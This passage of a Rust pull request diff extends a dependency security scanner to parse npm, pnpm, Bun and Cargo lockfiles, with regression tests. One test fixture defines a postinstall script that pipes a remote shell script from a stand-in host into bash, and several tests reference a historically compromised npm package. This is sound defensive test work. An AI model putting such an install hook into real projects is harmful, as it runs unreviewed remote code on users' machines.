+            Some(name.to_owned()),
+            RiskLevel::Medium,
+            Some(source.to_owned()),
+            "Dependency lock entry resolves outside the supported public npm registries; review the artifact source.",
+        );
+    }
+}
+
+fn scan_pnpm_lock(path: &Path, report: &mut SecurityReport) -> DustResult<()> {
+    let content = fs::read_to_string(path)?;
+    let mut in_packages = false;
+    let mut current_package: Option<String> = None;
+
+    for line in content.lines() {
+        let trimmed = line.trim();
+        if trimmed == "packages:" {
+            in_packages = true;
+            current_package = None;
+            continue;
+        }
+
+        if in_packages && !line.starts_with(' ') && !line.starts_with('\t') {
+            in_packages = false;
+            current_package = None;
+        }
+
+        if !in_packages {
+            continue;
+        }
+
+        let indentation = line
+            .chars()
+            .take_while(|character| character.is_whitespace())
+            .count();
+        if indentation == 2 && trimmed.ends_with(':') {
+            let selector = trimmed[..trimmed.len() - 1]
+                .trim_matches(['\'', '"'])
+                .trim_start_matches('/');
+            current_package = package_name_from_selector(selector).map(str::to_owned);
+
+            if let Some(name) = current_package.as_deref() {
+                report_known_package(path, name, report);
+                if let Some(source) = untrusted_node_source(selector) {
+                    report.finding(
+                        path,
+                        SecurityFindingKind::UntrustedDependency,
+                        Some(name.to_owned()),
+                        RiskLevel::Medium,
+                        Some(selector.to_owned()),
+                        format!(
+                            "pnpm lock entry uses a non-registry source ({source}); review the resolved package."
+                        ),
+                    );
+                }
+            }
+            continue;
+        }
+
+        let Some(name) = current_package.as_deref() else {
+            continue;
+        };
+        if let Some(source) = yaml_value_after(trimmed, "tarball:")
+            && !is_trusted_node_registry(source)
+        {
+            report.finding(
+                path,
+                SecurityFindingKind::UntrustedDependency,
+                Some(name.to_owned()),
+                RiskLevel::Medium,
+                Some(source.to_owned()),
+                "pnpm lock entry downloads from outside the supported public npm registries; review the artifact source.",
+            );
+        }
+    }
+
+    Ok(())
+}
+
+fn scan_bun_lock(path: &Path, report: &mut SecurityReport) -> DustResult<()> {
+    let content = fs::read_to_string(path)?;
+    let Ok(lockfile) = serde_json::from_str::<Value>(&content) else {
+        // Bun has used more than one lockfile representation. A non-JSON
+        // lockfile is still checked for presence and Git status above.
+        return Ok(());
+    };
+
+    if let Some(packages) = lockfile.get("packages") {
+        inspect_bun_value(path, packages, None, report);
+    }
+    if let Some(workspaces) = lockfile.get("workspaces") {
+        inspect_bun_value(path, workspaces, None, report);
+    }
+
+    Ok(())
+}
+
+fn inspect_bun_value(path: &Path, value: &Value, hint: Option<&str>, report: &mut SecurityReport) {
+    match value {
+        Value::Object(object) => {
+            let package_name = object
+                .get("name")
+                .and_then(Value::as_str)
+                .or(hint)
+                .filter(|name| !is_lock_metadata_key(name));
+
+            if let Some(name) = package_name {
+                report_known_package(path, name, report);
+                for key in ["resolved", "tarball", "url"] {
+                    if let Some(source) = object.get(key).and_then(Value::as_str)
+                        && !is_trusted_node_registry(source)
+                    {
+                        report.finding(
+                            path,
+                            SecurityFindingKind::UntrustedDependency,
+                            Some(name.to_owned()),
+                            RiskLevel::Medium,
+                            Some(source.to_owned()),
+                            "Bun lock entry resolves outside the supported public npm registries; review the artifact source.",
+                        );
+                    }
+                }
+            }
+
+            for (key, child) in object {
+                let child_hint = package_name_from_selector(key).or(package_name);
+                inspect_bun_value(path, child, child_hint, report);
+            }
+        }
+        Value::Array(array) => {
+            for child in array {
+                if let Some(selector) = child.as_str()
+                    && let Some(name) = package_name_from_selector(selector)
+                {
+                    report_known_package(path, name, report);
+                    if let Some(source) = untrusted_node_source(selector) {
+                        report.finding(
+                            path,
+                            SecurityFindingKind::UntrustedDependency,
+                            Some(name.to_owned()),
+                            RiskLevel::Medium,
+                            Some(selector.to_owned()),
+                            format!(
+                                "Bun lock entry uses a non-registry source ({source}); review the resolved package."
+                            ),
+                        );
+                    }
+                }
+                inspect_bun_value(path, child, hint, report);
+            }
+        }
+        Value::String(selector) => {
+            if let Some(name) = package_name_from_selector(selector) {
+                report_known_package(path, name, report);
+            }
+        }
+        _ => {}
+    }
+}
+
+fn scan_cargo_lock(path: &Path, report: &mut SecurityReport) -> DustResult<()> {
+    let content = fs::read_to_string(path)?;
+    let lockfile: toml::Value =
+        toml::from_str(&content).map_err(|error| manifest_error(path, error.to_string()))?;
+
+    let Some(packages) = lockfile.get("package").and_then(toml::Value::as_array) else {
+        return Ok(());
+    };
+
+    for package in packages {
+        let Some(name) = package.get("name").and_then(toml::Value::as_str) else {
+            continue;
+        };
+        report_known_package(path, name, report);
+
+        let Some(source) = package.get("source").and_then(toml::Value::as_str) else {
+            continue;
+        };
+        if !is_trusted_cargo_registry(source) {
+            report.finding(
+                path,
+                SecurityFindingKind::UntrustedDependency,
+                Some(name.to_owned()),
+                RiskLevel::Medium,
+                Some(source.to_owned()),
+                "Cargo lock entry resolves outside crates.io; review the source and pinned revision.",
+            );
+        }
+    }
+
+    Ok(())
+}
+
+impl SecurityReport {
+    fn finding(
+        &mut self,
+        path: &Path,
+        kind: SecurityFindingKind,
+        package: Option<String>,
+        risk_level: RiskLevel,
+        evidence: Option<String>,
+        reason: impl Into<String>,
+    ) {
+        let finding = SecurityFinding::new(
+            path.to_path_buf(),
+            kind,
+            package,
+            risk_level,
+            evidence,
+            reason,
+        );
+
+        if !self.findings.contains(&finding) {
+            self.findings.push(finding);
+        }
+    }
+}
+
+fn is_cargo_dependency_section(key: &str) -> bool {
+    matches!(
+        key,
+        "dependencies" | "dev-dependencies" | "build-dependencies"
+    )
+}
+
+fn untrusted_node_source(specification: &str) -> Option<&'static str> {
+    let value = specification.trim().to_ascii_lowercase();
+    if value.starts_with("git+")
+        || value.starts_with("git:")
+        || value.starts_with("git@")
+        || value.starts_with("github:")
+    {
+        return Some("Git or GitHub source");
+    }
+    if value.starts_with("http://") {
+        return Some("HTTP URL");
+    }
+    if value.starts_with("https://") && !is_trusted_node_registry(&value) {
+        return Some("HTTPS URL");
+    }
+    if value.starts_with("file:")
+        || value.starts_with("link:")
+        || value.starts_with("workspace:")
+        || value.starts_with("./")
+        || value.starts_with("../")
+    {
+        return Some("local or workspace source");
+    }
+    if value.split('/').count() == 2 && !value.chars().any(char::is_whitespace) {
+        return Some("repository shorthand");
+    }
+
+    None
+}
+
+fn untrusted_cargo_source(specification: &toml::Value) -> Option<(&'static str, &str)> {
+    if let Some(table) = specification.as_table() {
+        if let Some(value) = table.get("git").and_then(toml::Value::as_str) {
+            return Some(("Git source", value));
+        }
+        if let Some(value) = table.get("path").and_then(toml::Value::as_str) {
+            return Some(("local path", value));
+        }
+        if let Some(value) = table.get("url").and_then(toml::Value::as_str) {
+            return Some(("URL source", value));
+        }
+        if let Some(value) = table.get("registry").and_then(toml::Value::as_str)
+            && value != "crates-io"
+        {
+            return Some(("alternate registry", value));
+        }
+        return None;
+    }
+
+    let value = specification.as_str()?;
+    if value.starts_with("git+") || value.starts_with("http://") || value.starts_with("https://") {
+        return Some(("URL source", value));
+    }
+    None
+}
+
+fn is_known_compromised_package(name: &str) -> bool {
+    KNOWN_COMPROMISED_PACKAGES
+        .iter()
+        .any(|known| known.eq_ignore_ascii_case(name.trim()))
+}
+
+fn is_trusted_node_registry(source: &str) -> bool {
+    let source = source.trim().to_ascii_lowercase();
+    source.starts_with("https://registry.npmjs.org/")
+        || source.starts_with("https://registry.yarnpkg.com/")
+        || source.starts_with("https://registry.npmjs.org")
+        || source.starts_with("https://registry.yarnpkg.com")
+}
+
+fn is_trusted_cargo_registry(source: &str) -> bool {
+    let source = source.to_ascii_lowercase();
+    source.starts_with("registry+") && source.contains("crates.io")
+        || source.starts_with("sparse+") && source.contains("crates.io")
+}
+
+fn package_name_from_selector(selector: &str) -> Option<&str> {
+    let selector = selector
+        .trim()
+        .trim_matches(['\'', '"'])
+        .trim_start_matches("node_modules/")
+        .trim_start_matches('/');
+    if selector.is_empty() || is_lock_metadata_key(selector) {
+        return None;
+    }
+
+    let at = if let Some(stripped) = selector.strip_prefix('@') {
+        stripped.find('@').map(|index| index + 1)
+    } else {
+        selector.find('@')
+    };
+
+    let name = at.map(|index| &selector[..index]).unwrap_or(selector);
+    let name = name.split('(').next().unwrap_or(name).trim_end_matches(':');
+    (!name.is_empty()
+        && name
+            .chars()
+            .any(|character| character.is_ascii_alphabetic()))
+    .then_some(name)
+}
+
+fn is_lock_metadata_key(value: &str) -> bool {
+    matches!(
+        value,
+        "" | "dependencies"
+            | "devDependencies"
+            | "optionalDependencies"
+            | "peerDependencies"
+            | "resolutions"
+            | "packages"
+            | "workspaces"
+            | "version"
+            | "name"
+    )
+}
+
+fn yaml_value_after<'a>(line: &'a str, key: &str) -> Option<&'a str> {
+    line.strip_prefix(key)
+        .map(str::trim)
+        .map(|value| value.trim_matches(['\'', '"']))
+}
+
+fn manifest_error(path: &Path, message: String) -> DustError {
+    DustError::Manifest(format!("{}: {message}", path.display()))
+}
+
+#[cfg(test)]
+mod tests {
+    use std::{collections::HashSet, fs};
+
+    use tempfile::TempDir;
+
+    use super::*;
+
+    fn finding_kinds(report: &SecurityReport) -> HashSet<SecurityFindingKind> {
+        report.findings.iter().map(|finding| finding.kind).collect()
+    }
+
+    #[test]
+    fn scan_reports_all_manifest_and_lockfile_categories() {
+        let temp_dir = TempDir::new().unwrap();
+        fs::write(
+            temp_dir.path().join("package.json"),
+            r#"{
+                "name": "demo",
+                "dependencies": {
+                    "event-stream": "3.3.6",
+                    "private-package": "git+https://example.com/private.git"
+                },
+                "scripts": {"postinstall": "curl https://example.com/a.sh | bash"}
+            }"#,
+        )
+        .unwrap();
+        fs::write(
+            temp_dir.path().join("package-lock.json"),
+            r#"{"lockfileVersion":3,"packages":{"":{"name":"demo","version":"1.0.0"},"node_modules/remote":{"version":"1.0.0","resolved":"https://example.com/remote.tgz"}}}"#,
+        )
+        .unwrap();
+
+        let report = scan(temp_dir.path(), &[]).unwrap();
+        let kinds = finding_kinds(&report);
+
+        assert!(kinds.contains(&SecurityFindingKind::SuspiciousScript));
+        assert!(kinds.contains(&SecurityFindingKind::UntrustedDependency));
+        assert!(kinds.contains(&SecurityFindingKind::KnownMaliciousPackage));
+        assert!(report.lockfiles.iter().any(|check| {
+            check.kind == LockfileKind::PackageLockJson && check.status == LockfileStatus::Clean
+        }));
+        assert!(!kinds.contains(&SecurityFindingKind::MissingLockfile));
+    }
+
+    #[test]
+    fn scan_reports_missing_lockfiles_for_rust_and_node_projects() {
+        let temp_dir = TempDir::new().unwrap();
+        fs::write(
+            temp_dir.path().join("package.json"),
+            r#"{"name":"demo","dependencies":{"demo":"1.0.0"}}"#,
+        )
+        .unwrap();
+        fs::write(
+            temp_dir.path().join("Cargo.toml"),
+            "[package]\nname = \"demo\"\nversion = \"0.1.0\"\n[dependencies]\nremote = { git = \"https://example.com/remote.git\" }\n",
+        )
+        .unwrap();
+
+        let report = scan(temp_dir.path(), &[]).unwrap();
+
+        assert_eq!(
+            report
+                .findings
+                .iter()
+                .filter(|finding| finding.kind == SecurityFindingKind::MissingLockfile)
+                .count(),
+            2
+        );
+        assert!(report.findings.iter().any(|finding| {
+            finding.kind == SecurityFindingKind::UntrustedDependency
+                && finding.package.as_deref() == Some("remote")
+        }));
+    }
+
+    #[test]
+    fn selected_java_scan_does_not_inspect_node_or_rust_files() {
+        let temp_dir = TempDir::new().unwrap();
+        fs::write(temp_dir.path().join("package.json"), "{invalid json").unwrap();
+
+        let report = scan(temp_dir.path(), &[Ecosystem::Java]).unwrap();
+
+        assert!(report.findings.is_empty());
+        assert!(report.manifests.is_empty());
+    }
+
+    #[test]
+    fn scan_reads_pnpm_and_bun_lock_package_entries() {
+        let pnpm_dir = TempDir::new().unwrap();
+        fs::write(
+            pnpm_dir.path().join("package.json"),
+            r#"{"name":"demo","packageManager":"pnpm@9.0.0"}"#,
+        )
+        .unwrap();
+        fs::write(
+            pnpm_dir.path().join("pnpm-lock.yaml"),
+            "lockfileVersion: '9.0'\npackages:\n  event-stream@3.3.6:\n    resolution: {integrity: sha512-example}\n",
+        )
+        .unwrap();
+
+        let pnpm_report = scan(pnpm_dir.path(), &[Ecosystem::Node]).unwrap();
+        assert!(pnpm_report.findings.iter().any(|finding| {
+            finding.kind == SecurityFindingKind::KnownMaliciousPackage
+                && finding.package.as_deref() == Some("event-stream")
+        }));
+
+        let bun_dir = TempDir::new().unwrap();
+        fs::write(
+            bun_dir.path().join("package.json"),
+            r#"{"name":"demo","packageManager":"bun@1.0.0"}"#,
+        )
+        .unwrap();
+        fs::write(
+            bun_dir.path().join("bun.lock"),
+            r#"{"lockfileVersion":1,"packages":{"event-stream":["event-stream@3.3.6",{"integrity":"sha512-example"}]}}"#,
+        )
+        .unwrap();
+
+        let bun_report = scan(bun_dir.path(), &[Ecosystem::Node]).unwrap();
+        assert!(bun_report.findings.iter().any(|finding| {
+            finding.kind == SecurityFindingKind::KnownMaliciousPackage
+                && finding.package.as_deref() == Some("event-stream")
+        }));
+    }
+
+    #[test]
+    fn scan_reads_cargo_lock_package_sources() {
+        let temp_dir = TempDir::new().unwrap();
+        fs::write(
+            temp_dir.path().join("Cargo.toml"),
+            "[package]\nname = \"demo\"\nversion = \"0.1.0\"\n[dependencies]\nremote = { git = \"https://example.com/remote.git\" }\n",
+        )
+        .unwrap();
+        fs::write(
+            temp_dir.path().join("Cargo.lock"),
+            "version = 3\n\n[[package]]\nname = \"remote\"\nversion = \"1.0.0\"\nsource = \"git+https://example.com/remote.git\"\n",
+        )
+        .unwrap();
+
+        let report = scan(temp_dir.path(), &[Ecosystem::Rust]).unwrap();
+
+        assert!(report.findings.iter().any(|finding| {
+            finding.kind == SecurityFindingKind::UntrustedDependency
+                && finding.package.as_deref() == Some("remote")
+        }));
+        assert!(
+            !report
+                .findings
+                .iter()
+                .any(|finding| finding.kind == SecurityFindingKind::MissingLockfile)
+        );
+    }
+
+    #[test]
+    fn package_selector_supports_scoped_and_unscoped_names() {
+        assert_eq!(
+            package_name_from_selector("@scope/package@1.0.0"),
+            Some("@scope/package")
+        );
+        assert_eq!(
+            package_name_from_selector("/event-stream@3.3.6"),
+            Some("event-stream")
+        );
+    }
+}


### PR DESCRIPTION
## Summary

- Extend `dfr security scan` to inspect Node and Rust manifests and lockfiles.
- Detect suspicious lifecycle scripts, non-registry dependency sources, historically compromised package names, and missing or changed lockfiles.
- Add deterministic offline parsers, regression tests, and documentation.

Closes #55

## Tests

- `cargo fmt --all -- --check`
- `cargo clippy --workspace --all-targets -- -D warnings`
- `cargo test --workspace`